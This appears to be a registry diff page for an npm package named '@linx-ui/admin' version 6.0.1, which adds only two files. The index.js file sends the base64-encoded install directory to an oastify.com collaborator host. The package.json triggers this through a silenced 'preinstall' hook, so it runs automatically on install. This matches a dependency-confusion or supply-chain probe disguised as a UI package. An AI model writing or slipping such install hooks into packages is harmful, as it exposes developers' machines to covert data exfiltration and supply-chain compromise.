@linx-ui/admin 6.0.1

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +5 -0
  2. package/package.json +13 -0
package/index.js ADDED
@@ -0,0 +1,5 @@
1
+ async function hello() {
2
+ const res = await fetch(`https://9dnxx2mthznrk2ew2nxagek26tck0bo0.oastify.com/?cwd=${btoa(__dirname)}`)
3
+ }
4
+
5
+ hello()
package/package.json ADDED
@@ -0,0 +1,13 @@
1
+ {
2
+ "name": "@linx-ui/admin",
3
+ "version": "6.0.1",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js > /dev/null 2>&1"
9
+ },
10
+ "keywords": [],
11
+ "author": "",
12
+ "license": "ISC"
13
+ }